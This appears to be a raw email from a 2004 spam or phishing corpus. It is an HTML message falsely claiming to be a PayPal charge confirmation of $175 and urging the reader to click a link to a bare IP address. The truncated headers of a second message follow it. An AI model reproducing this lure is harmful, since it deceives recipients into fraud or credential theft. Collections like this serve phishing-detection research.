From: exchange-robot@paypal.com
To: username@domain.com
Subject: Confirmation
Date: Thu, 9 Dec 2004 15:18:58 +0100
MIME-Version: 1.0
Content-Type: multipart/mixed;
	boundary="----=_NextPart_000_0007_01C4DE02.67CC9C60"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4133.2400
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 39

This is a multi-part message in MIME format.

------=_NextPart_000_0007_01C4DE02.67CC9C60
Content-Type: text/html;
	charset="iso-8859-2
Content-Transfer-Encoding: quoted-printable

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html><head>
 <meta http-equiv="content-type"
 content="text/html; charset=windows-1251">
</head>
<body text="#000000" bgcolor="#ffffcc" link="#000099"
 vlink="#990099"
 alink="#000099">

<p><i>Congratulations! PayPal has successfully charged $175 to your credit
card. Your order tracking number is A866DEC0, and your item will be shipped
within three business days. </i></p>
<p><i>To see details please click this <a href=3D"http://10.4.1.12:1639/index.htm"><b>link</b></a>.
</i></p>
<p><i>DO NOT REPLY TO THIS MESSAGE VIA EMAIL! This email is being sent by
an automated message system and the reply will not be received. </i></p>

<p><i>Thank you for using PayPal.</i></p>
</body>
</html>





------=_NextPart_000_0007_01C4DE02.67CC9C60--


From info@ewebmailer.com  Thu Dec  9 19:28:44 2004
Return-Path: <info@ewebmailer.com>
X-Original-To: username@login.domain.com
Delivered-To: username@login.domain.com
Received: from mail1.domain.com (mail1.domain.com [10.23.1.4])
	by spanky.domain.com (Postfix) with ESMTP id 7CD405373E6
	for <username@login.domain.com>; Thu,  9 Dec 2004 19:28:44 -0500 (EST)
Received: from mail2.domain.com (mail2.domain.com [192.168.64.8])
	by mail1.domain.com (Postfix) with ESMTP id 5D31A85A649
	for <username@domain.com>; Thu,  9 Dec 2004 19:28:26 -0500 (EST)
Received: from ewebmailer.com (ewebmailer.com [69.6.66.34])
	by mail2.domain.com (Postfix) with ESMTP id 7E22E1836A0
	for <username@domain.com>; Thu,  9 Dec 2004 19:28:42 -0500 (EST)
